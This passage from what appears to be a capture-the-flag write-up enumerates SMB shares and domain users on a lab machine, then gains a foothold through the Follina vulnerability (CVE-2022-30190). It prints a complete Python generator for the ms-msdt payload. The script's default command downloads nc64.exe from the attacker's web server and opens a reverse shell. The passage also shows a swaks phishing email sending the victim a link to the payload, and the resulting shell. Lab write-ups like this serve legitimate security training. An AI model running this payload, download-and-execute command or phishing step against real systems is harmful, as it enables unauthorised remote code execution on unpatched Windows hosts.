SMB - 139,445

smbmap -H 10.10.11.175  -u "guest" -p ""

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - [email protected]
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                          
                                                                                                                             
[+] IP: 10.10.11.175:445        Name: 10.10.11.175              Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Shares                                                  READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share 
        UpdateServicesPackages                                  NO ACCESS       A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
        WsusContent                                             NO ACCESS       A network share to be used by Local Publishing to place published content on this WSUS system.
        WSUSTemp                                                NO ACCESS       A network share used by Local Publishing from a Remote WSUS Console Instance.
[*] Closed 1 connections

smbclient -N //10.10.11.175/Shares 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jun 20 10:01:33 2022
  ..                                  D        0  Mon Jun 20 10:01:33 2022
  NOC_Reminder.pdf                   AR   106977  Mon Jun 20 10:00:32 2022

                9116415 blocks of size 4096. 1495783 blocks available
smb: \> get NOC_Reminder.pdf 
getting file \NOC_Reminder.pdf of size 106977 as NOC_Reminder.pdf (112.5 KiloBytes/sec) (average 112.5 KiloBytes/sec)
smb: \>

CVE-2022-30190 is Follina which is an unauthorized RCE vulnerability which is explained in this blog post.

lookupsid.py [email protected] -no-pass | grep SidTypeUser | cut -d' ' -f2 | cut -d'\' -f2 | tr '[:upper:]' '[:lower:]' | tee users

cat users            
administrator
guest
krbtgt
dc$
client$
btables
sflowers

So about the CVE, after reading it, it seems like we have to craft a malicious .docx or according to this PoC, a .rtf file and send it to the victim to open it, which will then make a request to a secondary payload that we need to host via a webserver and upon execution, we will get foothold. The blog post says that in some cases if the file is .rft, just the preview will be enough to execute the payload without user interaction. On the above pdf file that I found there is an email address there, so many we send it to this email and hope that our victim receives it! [email protected]

So first I created the msdt.html file:

cat follina.py                
#!/usr/bin/env python3

import base64
import random
import string
import sys

if len(sys.argv) > 1:
    command = sys.argv[1]
else:
    command = "IWR http://10.10.16.10:8000/nc64.exe -outfile C:\\programdata\\nc64.exe; C:\\programdata\\nc64.exe 10.10.16.10 1337 -e cmd"

base64_payload = base64.b64encode(command.encode("utf-8")).decode("utf-8")

# Slap together a unique MS-MSDT payload that is over 4096 bytes at minimum
html_payload = f"""<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{base64_payload}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\""; //"""
html_payload += (
    "".join([random.choice(string.ascii_lowercase) for _ in range(4096)])
    + "\n</script>"
)

print(html_payload)

python3 follina.py > msdt.html

And then started an http server with both this html file and nc64.exe.

After that I sent the email with the link to the msdt.html file:

swaks --to [email protected] --from "[email protected]" --header "Subject: Internal Web Application" --body "http://10.10.16.10/msdt.html"

After waiting for sometime on the listener we get a shell:

nc -lnvp 1337  
listening on [any] 1337 ...
connect to [10.10.16.10] from (UNKNOWN) [10.10.11.175] 49837
Microsoft Windows [Version 10.0.19043.928]
(c) Microsoft Corporation. All rights reserved.

C:\Users\btables\AppData\Local\Temp\SDIAG_529268d3-0484-42b8-a4ff-22617a96df7f>

PreviousDNS - 53 NextFoothold

Last updated 10 months ago